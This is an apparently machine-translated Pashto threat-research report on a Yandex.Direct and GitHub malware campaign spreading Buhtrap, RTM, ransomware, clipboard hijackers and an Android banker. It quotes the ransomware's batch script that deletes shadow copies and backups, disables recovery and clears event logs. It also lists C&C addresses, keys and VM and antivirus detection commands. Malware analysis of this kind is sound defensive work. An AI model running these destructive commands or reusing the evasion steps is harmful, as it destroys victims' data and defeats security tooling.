شاته دروازه او بوهټراپ کوډ کونکی د Yandex.Direct په کارولو سره توزیع شوي

په سایبر برید کې د محاسبینو په نښه کولو لپاره، تاسو کولی شئ د کار اسناد وکاروئ چې دوی آنلاین لټون کوي. دا تقریبا هغه څه دي چې د سایبر ګروپ په تیرو څو میاشتو کې ترسره کوي، پیژندل شوي شاته دروازې توزیع کوي. بوتراپ и RTM، په بیله بیا د کریپټو اسعارو غلا کولو لپاره کوډ کونکي او سافټویر. ډیری هدفونه په روسیه کې موقعیت لري. برید په Yandex.Direct کې د ناوړه اعلاناتو په ورکولو سره ترسره شو. احتمالي قربانیان یوې ویب پاڼې ته لیږل شوي چیرې چې له دوی څخه غوښتل شوي چې د اسنادو ټیمپلیټ په څیر یو ناوړه فایل ډاونلوډ کړي. یاندیکس زموږ د خبرتیا وروسته ناوړه اعلانونه لرې کړل.

د بوهتراپ د سرچینې کوډ په تیرو وختونو کې آنلاین لیک شوی ترڅو هرڅوک یې وکاروي. موږ د RTM کوډ شتون په اړه هیڅ معلومات نه لرو.

پدې پوسټ کې به موږ تاسو ته ووایو چې برید کونکو څنګه د Yandex.Direct په کارولو سره مالویر توزیع کړی او په GitHub کې یې کوربه توب کړی. پوسټ به د مالویر تخنیکي تحلیل سره پای ته ورسیږي.

Buhtrap او RTM بیرته په سوداګرۍ کې دي

د خپریدو او قربانیانو میکانیزم

قربانیانو ته سپارل شوي مختلف تادیات د تبلیغاتو یو ګډ میکانیزم شریکوي. د برید کونکو لخوا رامینځته شوي ټول ناوړه فایلونه په دوه مختلف GitHub ذخیره کې ځای په ځای شوي.

په عموم ډول، ذخیره کې یو د ډاونلوډ وړ ناوړه فایل شتون لري، چې په مکرر ډول بدلیږي. څرنګه چې GitHub تاسو ته اجازه درکوي په ذخیره کې د بدلونونو تاریخ وګورئ، موږ کولی شو وګورو چې کوم مالویر د یوې ټاکلې مودې په جریان کې ویشل شوی و. د دې لپاره چې قرباني قانع کړي چې ناوړه فایل ډاونلوډ کړي، ویب پاڼه blanki-shabloni24[.]ru، په پورته انځور کې ښودل شوې، کارول شوې.

د سایټ ډیزاین او د ناوړه فایلونو ټول نومونه یو واحد مفهوم تعقیبوي - فورمې، ټیمپلیټونه، قراردادونه، نمونې، او داسې نور. د دې په پام کې نیولو سره چې د بوهټراپ او RTM سافټویر په تیرو وختونو کې د محاسبینو په بریدونو کې کارول شوي، موږ فکر کاوه چې په نوي کمپاین کې ستراتیژي ورته ده. یوازینۍ پوښتنه دا ده چې قرباني څنګه د برید کونکي ځای ته ورسید.

انفیکشن

لږترلږه ډیری احتمالي قربانیان چې پدې سایټ کې پای ته رسیدلي د ناوړه اعلاناتو لخوا راجلب شوي. لاندې یو مثال URL دی:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

لکه څنګه چې تاسو د لینک څخه لیدلی شئ، بینر د قانوني حساب ورکولو فورم bb.f2[.]kz کې ځړول شوی و. دا مهمه ده چې په یاد ولرئ چې بینرونه په مختلفو سایټونو کې ښکاره شوي، ټول د ورته کمپاین ID (blanki_rsya)، او ډیری یې د محاسبې یا قانوني مرستې خدماتو پورې تړاو لري. URL ښیي چې احتمالي قرباني د "د رسید فارم ډاونلوډ" غوښتنه کارولې، کوم چې د هدفي بریدونو زموږ فرضیه مالتړ کوي. لاندې هغه سایټونه دي چیرې چې بینرونه څرګند شوي او د اړونده لټون پوښتنې.

• د رسید فارم ډاونلوډ کړئ - bb.f2[.]kz
• نمونه قرارداد - Ipopen[.]ru
• د غوښتنلیک د شکایت نمونه - 77metrov[.]ru
• د تړون فورمه - blank-dogovor-kupli-prodazhi[.]ru
• نمونه محکمه عریضه - zen.yandex[.]ru
• نمونه شکایت - yurday[.]ru
• د نمونې قرارداد فورمې – Regforum[.]ru
• د قرارداد فورمه – معاون[.]ru
• د نمونې اپارتمان تړون - napravah[.]com
• د قانوني قراردادونو نمونې - avito[.]ru

د blanki-shabloni24[.]ru سایټ ممکن د ساده لید ارزونې تیرولو لپاره ترتیب شوی وي. عموما، یو اعلان چې د ګیټ هب سره د لینک سره مسلکي لید سایټ ته اشاره کوي داسې نه بریښي چې یو څه په ښکاره ډول خراب وي. برسېره پردې، برید کونکو ناوړه فایلونه یوازې د محدودې مودې لپاره ذخیره ته پورته کړل، احتمال یې د کمپاین په جریان کې. ډیری وخت، د GitHub ذخیره کې یو خالي زپ آرشیف یا خالي EXE فایل لري. په دې توګه، برید کونکي کولی شي اعلانونه د Yandex.Direct له لارې په سایټونو کې توزیع کړي چې ډیری احتمال یې د محاسبینو لخوا لیدل شوي چې د ځانګړو لټون پوښتنو په ځواب کې راغلي.

بیا ، راځئ چې په دې ډول توزیع شوي مختلف تادیاتو ته وګورو.

د پایلوډ تحلیل

د توزیع کرونولوژي

ناوړه کمپاین د اکتوبر 2018 په پای کې پیل شو او د لیکلو په وخت کې فعال دی. څرنګه چې ټول ذخیره په GitHub کې په عامه توګه شتون درلود، موږ د شپږ مختلف مالویر کورنیو ویشلو دقیق مهال ویش ترتیب کړ (لاندې انځور وګورئ). موږ یوه کرښه اضافه کړې چې ښیې کله چې د بینر لینک وموندل شو ، لکه څنګه چې د ESET ټیلی میټري لخوا اندازه شوی ، د git تاریخ سره پرتله کولو لپاره. لکه څنګه چې تاسو لیدلی شئ، دا په GitHub کې د تادیاتو شتون سره ښه تړاو لري. د فبروري په پای کې توپیر د دې حقیقت له مخې تشریح کیدی شي چې موږ د بدلون تاریخ برخه نه درلوده ځکه چې ذخیره د GitHub څخه لیرې شوې وه مخکې لدې چې موږ یې په بشپړ ډول ترلاسه کړو.

شکل 1. د مالویر توزیع کرونولوژي.

د کوډ لاسلیک کولو سندونه

کمپاین ډیری سندونه کارولي. ځینې ​​​​یې د یو څخه ډیرو مالویر کورنۍ لخوا لاسلیک شوي، کوم چې نور په ګوته کوي چې مختلف نمونې د ورته کمپاین پورې تړاو لري. د خصوصي کیلي شتون سره سره، آپریټرانو په سیستماتیک ډول بائنریونه لاسلیک نه کړل او د ټولو نمونو لپاره کیلي یې ونه کاروله. د 2019 د فبروري په وروستیو کې، برید کونکو د ګوګل ملکیت سند په کارولو سره د غلط لاسلیکونو رامینځته کول پیل کړل چې دوی شخصي کیلي نلري.

ټول هغه سندونه چې په کمپاین کې ښکیل دي او د مالویر کورنۍ چې دوی یې لاسلیک کوي په لاندې جدول کې لیست شوي دي.

موږ د دې کوډ لاسلیک کولو سندونه هم کارولي ترڅو د نورو مالویر کورنیو سره اړیکې رامینځته کړي. د ډیری سندونو لپاره ، موږ نمونې ونه موندلې چې د GitHub ذخیره کولو له لارې ندي ویشل شوي. په هرصورت، د TOV "MARIA" سند د بوټینیټ پورې اړوند مالویر لاسلیک کولو لپاره کارول شوی و واوچوس, adware او miners. دا امکان نلري چې دا مالویر د دې کمپاین سره تړاو ولري. ډیری احتمال، سند په تیاره کې اخیستل شوی و.

Win32/Filecoder.Buhtrap

لومړۍ برخه چې زموږ پام یې ځانته را اړولی نوی کشف شوی Win32/Filecoder.Buhtrap و. دا د ډیلفي بائنری فایل دی چې ځینې وختونه بسته کیږي. دا په عمده توګه د فبروري - مارچ 2019 کې ویشل شوی و. دا د ransomware برنامه سره سم چلند کوي - دا محلي ډرایو او د شبکې فولډرونه لټوي او کشف شوي فایلونه کوډ کوي. دا د جوړیدو لپاره د انټرنیټ پیوستون ته اړتیا نلري ځکه چې دا د کوډ کولو کیلي لیږلو لپاره سرور سره اړیکه نه نیسي. پرځای یې، دا د تاوان پیغام پای ته "ټوکن" اضافه کوي، او د آپریټرانو سره د اړیکو لپاره د بریښنالیک یا Bitmessage کارولو وړاندیز کوي.

د امکان تر حده د ډیرو حساسو سرچینو کوډ کولو لپاره، Filecoder.Buhtrap د کلیدي سافټویر بندولو لپاره ډیزاین شوی تار چلوي کوم چې ممکن د خلاص فایل سمبالونکي ولري چې ارزښتناک معلومات لري چې کولی شي د کوډ کولو کې مداخله وکړي. د هدف پروسې په عمده توګه د ډیټابیس مدیریت سیسټمونه (DBMS) دي. برسېره پردې، Filecoder.Buhtrap د لاګ فایلونه او بیک اپ حذف کوي ترڅو د معلوماتو بیرته راګرځول ستونزمن کړي. د دې کولو لپاره، لاندې د بیچ سکریپټ چل کړئ.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap یو قانوني آنلاین IP Logger خدمت کاروي چې د ویب پاڼې لیدونکو په اړه د معلوماتو راټولولو لپاره ډیزاین شوی. دا د ransomware قربانیانو تعقیبولو لپاره دی، کوم چې د کمانډ لاین مسؤلیت دی:

mshta.exe "javascript:document.write('');"

د کوډ کولو لپاره فایلونه غوره کیږي که چیرې دوی د درې اخراج لیستونو سره سمون ونلري. لومړی، د لاندې توسیعونو سره فایلونه کوډ شوي ندي: .com، .cmd، .cpl، .dll، .exe، .hta، .lnk، .msc، .msi، .msp، .pif، .scr، .sys او .بیټ دوهم، ټول هغه فایلونه چې د هغې لپاره بشپړ لار د لاندې لیست څخه د ډایرکټر تارونه لري خارج شوي دي.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

دریم، د ځینې فایل نومونه هم د کوډ کولو څخه ایستل شوي، د دوی په منځ کې د تاوان پیغام فایل نوم. لیست لاندې وړاندې کیږي. په ښکاره ډول، دا ټول استثناوې د دې لپاره دي چې ماشین روان وساتي، مګر د لږ تر لږه سړک وړتوب سره.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

د فایل کوډ کولو سکیم

یوځل چې اعدام شي، مالویر د 512-bit RSA کلیدي جوړه رامینځته کوي. شخصي اکسپوننټ (d) او موډولس (n) بیا د هارډ کوډ شوي 2048-bit عامه کیلي (عامه توضیحي او موډولس) ، zlib-packed ، او base64 کوډ شوي سره کوډ شوي. د دې لپاره مسؤل کوډ په 2 شکل کې ښودل شوی.

شکل 2. د 512-bit RSA کلیدي جوړه تولید پروسې د Hex-Rays decompilation پایله.

لاندې د تولید شوي شخصي کیلي سره د ساده متن یوه بیلګه ده، کوم چې د تاوان پیغام سره تړلی نښه ده.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

د برید کونکو عامه کلیدي لاندې ورکړل شوې.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

فایلونه د AES-128-CBC په کارولو سره د 256-bit کیلي سره کوډ شوي دي. د هر کوډ شوي فایل لپاره، یو نوی کیلي او یو نوی ابتدايي ویکتور تولید کیږي. کلیدي معلومات د کوډ شوي فایل په پای کې اضافه شوي. راځئ چې د کوډ شوي فایل بڼه په پام کې ونیسو.
کوډ شوي فایلونه لاندې سرلیک لري:

د ویګا جادو ارزښت اضافه کولو سره د سرچینې فایل ډیټا لومړی 0x5000 بایټس ته کوډ شوی. د کوډ کولو ټول معلومات د لاندې جوړښت سره د فایل سره وصل دي:

- د فایل اندازه مارکر یوه نښه لري چې دا په ګوته کوي چې ایا فایل د اندازې له 0x5000 بایټ څخه لوی دی
- د AES کیلي بلب = ZlibCompress(RSAEncrypt(AES کیلي + IV، د تولید شوي RSA کلیدي جوړه عامه کیلي))
- د RSA کیلي بلب = ZlibCompress (RSAEncrypt (د RSA شخصي کیلي رامینځته شوې ، د هارډ کوډ شوي RSA عامه کیلي))

Win32/ClipBanker

Win32/ClipBanker یوه برخه ده چې د اکتوبر له وروستیو څخه د دسمبر 2018 په پیل کې په موقت ډول ویشل شوې. د دې رول د کلپ بورډ مینځپانګې څارل دي ، دا د کریپټو کرنسی والټونو پته ګوري. د هدف د والټ پته په ټاکلو سره، ClipBanker دا د هغه پته سره بدلوي چې باور کیږي د آپریټرانو پورې اړه لري. هغه نمونې چې موږ یې معاینه کړې نه بکس شوي او نه هم مغشوش شوي. یوازینی میکانیزم چې د چلند ماسک کولو لپاره کارول کیږي د تار کوډ کول دي. د آپریټر والټ پتې د RC4 په کارولو سره کوډ شوي دي. د هدف کریپټو اسعارو بیټکوین ، بټکوین نغدي ، ډوګیکوین ، ایتیریم او ریپل دي.

د هغه مودې په جریان کې چې مالویر د برید کونکو بټکوین بټو ته خپور شوی و، یو کوچنی مقدار VTS ته لیږل شوی و، کوم چې د کمپاین په بریالیتوب شک لري. برسیره پردې، هیڅ داسې شواهد شتون نلري چې وړاندیز وکړي چې دا لیږدونه د کلپ بینکر سره تړاو لري.

Win32/RTM

د Win32/RTM برخه د مارچ په 2019 کې د څو ورځو لپاره ویشل شوې وه. RTM یو Trojan بانکدار دی چې په ډیلفي کې لیکل شوی، چې موخه یې د لرې پرتو بانکدارۍ سیسټمونه دي. په 2017 کې، د ESET څیړونکو خپور کړ مفصل تحلیل د دې پروګرام په اړه، توضیحات لاهم اړونده دي. د 2019 په جنوري کې، پالو الټو شبکې هم خپور کړ د RTM په اړه د بلاګ پوسټ.

د بوتراپ لوډر

د یو څه وخت لپاره، یو ډاونلوډر په GitHub کې شتون درلود چې د پخوانیو بوهتراپ وسیلو سره ورته نه و. هغه وګرځي https://94.100.18[.]67/RSS.php?<some_id> د بل پړاو ترلاسه کولو لپاره او په مستقیم ډول په حافظه کې بار کړئ. موږ کولی شو د دویمې مرحلې کوډ دوه چلندونه توپیر کړو. په لومړي یو آر ایل کې، RSS.php په مستقیم ډول د بټراپ شاته دروازه تیره کړه - دا شاته دروازه د سرچینې کوډ لیک کیدو وروسته شتون لري خورا ورته ده.

په زړه پورې خبره دا ده چې موږ د بوهتراپ شاته دروازې سره ډیری کمپاینونه ګورو ، او دوی ادعا کوي د مختلف آپریټرانو لخوا پرمخ وړل کیږي. پدې حالت کې ، اصلي توپیر دا دی چې شاته دروازه په مستقیم ډول په حافظه کې بار شوې او د DLL پلي کولو پروسې سره معمول سکیم نه کاروي چې موږ یې په اړه خبرې وکړې. مخکې. برسېره پردې، آپریټرانو د RC4 کیلي بدله کړه چې د C&C سرور ته د شبکې ترافیک کوډ کولو لپاره کارول کیږي. په ډیری کمپاینونو کې چې موږ لیدلي، چلونکي د دې کیلي بدلولو زحمت نه کوي.

دوهم، ډیر پیچلی چلند دا و چې د RSS.php URL بل لوډر ته لیږدول شوی و. دا ځینې خنډونه پلي کړي، لکه د متحرک وارداتو میز بیا رغول. د بوټلوډر هدف د C&C سرور سره اړیکه نیول دي msiofficeupd[.]com/api/F27F84EDA4D13B15/2، لاګونه واستوئ او ځواب ته انتظار وکړئ. دا غبرګون د بلب په توګه پروسس کوي، په حافظه کې یې باروي او اجرا کوي. هغه تادیه چې موږ د دې لوډر په اجرا کولو کې ولیدل د بوهټراپ شاته دروازه وه ، مګر ممکن نورې برخې هم شتون ولري.

Android/Spy.Banker

په زړه پوري ، د Android لپاره یوه برخه هم د GitHub ذخیره کې وموندل شوه. هغه یوازې د یوې ورځې لپاره په اصلي څانګه کې و - د نومبر 1، 2018. په ګیټ هب کې د پوسټ کولو سربیره ، ESET ټیلی میټري د دې مالویر توزیع کیدو هیڅ شواهد ندي موندلي.

برخه د Android غوښتنلیک بسته (APK) په توګه کوربه شوې وه. دا په پراخه کچه پټه ده. ناوړه چلند په APK کې موقعیت لرونکي کوډ شوي JAR کې پټ دی. دا د دې کیلي په کارولو سره د RC4 سره کوډ شوی دی:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

ورته کیلي او الګوریتم د تارونو کوډ کولو لپاره کارول کیږي. JAR په کې موقعیت لري APK_ROOT + image/files. د فایل لومړی 4 بایټس د کوډ شوي JAR اوږدوالی لري، کوم چې د اوږدوالي ساحې وروسته سمدلاسه پیل کیږي.

د فایل د کوډ کولو سره، موږ وموندله چې دا انوبیس و - مخکې مستند شوی د Android لپاره بانکر. مالویر لاندې ځانګړتیاوې لري:

• د مایکروفون ثبت کول
• سکرین شاټونه اخیستل
• د GPS همغږي ترلاسه کول
• keylogger
• د وسیلې ډیټا کوډ کول او د تاوان غوښتنه
• سپیم لیږل

په زړه پورې خبره دا ده چې بانکر ټویټر د بل C&C سرور ترلاسه کولو لپاره د بیک اپ ارتباطي چینل په توګه کارولی. هغه نمونه چې موږ یې تحلیل کړې د @JonesTrader حساب کارولی، مګر د تحلیل په وخت کې دا لا دمخه بند شوی و.

بانکدار په Android وسیله کې د هدف غوښتنلیکونو لیست لري. دا د سوفوس مطالعې کې ترلاسه شوي لیست څخه اوږد دی. په لیست کې ډیری بانکي غوښتنلیکونه، د آنلاین پیرود پروګرامونه لکه ایمیزون او ای بی، او د کریپټو کارنسي خدمتونه شامل دي.

MSIL/ClipBanker.IH

د دې کمپاین د یوې برخې په توګه ویشل شوې وروستۍ برخه د .NET وینډوز اجرا وړ وه، کوم چې د 2019 په مارچ کې راڅرګند شو. د مطالعې ډیری نسخې د ConfuserEx v1.0.0 سره بسته شوي. د ClipBanker په څیر، دا برخه کلپ بورډ کاروي. د هغه هدف د کریپټو اسعارو پراخه لړۍ ده ، په بیله بیا په بھاپ کې وړاندیزونه. سربیره پردې، هغه د IP Logger خدمت کاروي ترڅو د Bitcoin شخصي WIF کیلي غلا کړي.

د ساتنې میکانیزمونه
د هغو ګټو سربیره چې ConfuserEx د ډیبګ کولو، ډمپ کولو، او لاسوهنې مخنیوي کې چمتو کوي، برخې کې د انټي ویروس محصولاتو او مجازی ماشینونو کشف کولو وړتیا شامله ده.

د دې تصدیق کولو لپاره چې دا په مجازی ماشین کې چلیږي، مالویر د BIOS معلوماتو غوښتنه کولو لپاره جوړ شوی وینډوز WMI کمانډ لاین (WMIC) کاروي، یعنې:

wmic bios

بیا برنامه د کمانډ محصول پارس کوي او کلیدي کلمې ګوري: VBOX، VirtualBox، XEN، qemu، bochs، VM.

د انټي ویروس محصولاتو موندلو لپاره ، مالویر د وینډوز مدیریت وسیلې (WMI) غوښتنه د وینډوز امنیت مرکز ته لیږي ManagementObjectSearcher API لکه څنګه چې لاندې ښودل شوي. د بیس 64 څخه د کوډ کولو وروسته تلیفون داسې ښکاري:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

شکل 3. د انټي ویروس محصولاتو پیژندلو پروسه.

برسېره پردې، مالویر ګوري چې ایا CryptoClipWatcher, د کلپبورډ بریدونو په وړاندې د ساتنې لپاره یوه وسیله او که چیرې روان وي، په دې پروسه کې ټولې تارونه وځنډوي، په دې توګه محافظت غیر فعالوي.

دوام

د مالویر نسخه چې موږ یې مطالعه کړې پخپله کاپي کوي %APPDATA%googleupdater.exe او د ګوګل لارښود لپاره "پټ" خاصیت ټاکي. بیا هغه ارزښت بدلوي SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell د وینډوز راجستر کې او لاره اضافه کوي updater.exe. په دې توګه، مالویر به هرکله چې کاروونکي ننوځي اعدام شي.

ناوړه چلند

د ClipBanker په څیر، مالویر د کلپ بورډ مینځپانګې څاري او د کریپټو کارنسي والټ پتې لټوي، او کله چې وموندل شي، دا د یو آپریټر پتې سره بدلوي. لاندې د هدف پتې لیست دی د هغه څه پراساس چې په کوډ کې موندل کیږي.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

د هر ډول پتې لپاره یو ورته منظم بیان شتون لري. د STEAM_URL ارزښت د بھاپ سیسټم برید کولو لپاره کارول کیږي، لکه څنګه چې د منظم بیان څخه لیدل کیدی شي چې په بفر کې تعریف کولو لپاره کارول کیږي:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

د اخراج چینل

په بفر کې د پتې ځای په ځای کولو سربیره، مالویر د Bitcoin، Bitcoin کور او Electrum Bitcoin والټونو شخصي WIF کیلي په نښه کوي. برنامه د WIF شخصي کیلي ترلاسه کولو لپاره plogger.org د استخراج چینل په توګه کاروي. د دې کولو لپاره، آپریټران د کاروونکي ایجنټ HTTP سرلیک ته شخصي کلیدي ډاټا اضافه کوي، لکه څنګه چې لاندې ښودل شوي.

شکل 4. IP Logger کنسول د محصول ډاټا سره.

آپریټرانو iplogger.org د بټو د ایستلو لپاره نه کارولي. دوی شاید په ساحه کې د 255 کرکټر محدودیت له امله مختلف میتود ته لاره هواره کړي User-Agentد IP Logger ویب انٹرفیس کې ښودل شوي. په هغه نمونو کې چې موږ مطالعه کړې، د محصول بل سرور د چاپیریال متغیر کې زیرمه شوی DiscordWebHook. په حیرانتیا سره، دا چاپیریال متغیر په کوډ کې هیڅ ځای نه دی ټاکل شوی. دا وړاندیز کوي چې مالویر لاهم د پراختیا لاندې دی او متغیر د آپریټر ازموینې ماشین ته ګمارل شوی.

بله نښه شتون لري چې برنامه د پراختیا په حال کې ده. د بائنری فایل کې دوه iplogger.org URLs شامل دي، او دواړه پوښتل کیږي کله چې ډیټا خارج شي. د دې یو آر ایل په غوښتنه کې، د ریفرر ساحه کې ارزښت د "DEV /" څخه مخکې دی. موږ یوه نسخه هم وموندله چې د ConfuserEx په کارولو سره بسته شوې نه وه، د دې URL ترلاسه کوونکي د DevFeedbackUrl په نوم یادیږي. د چاپیریال متغیر نوم پراساس، موږ باور لرو چې آپریټران پالن لري چې د قانوني خدماتو ډیسکارډ او د دې ویب مداخلې سیسټم کارولو لپاره د کریپټو کارنسي بټو غلا کړي.

پایلې

دا کمپاین په سایبر بریدونو کې د مشروع اعلاناتو خدماتو کارولو یوه بیلګه ده. دا سکیم د روسیې سازمانونه په نښه کوي، مګر موږ به حیران نه شو چې دا ډول برید د غیر روسی خدماتو په کارولو سره وګورو. د جوړجاړي څخه مخنیوي لپاره، کاروونکي باید د سافټویر د سرچینې په شهرت باور ولري چې دوی یې ډاونلوډ کوي.

د جوړجاړي د شاخصونو بشپړ لیست او د MITER ATT&CK ځانګړتیاو کې شتون لري مخونه.

سرچینه: www.habr.com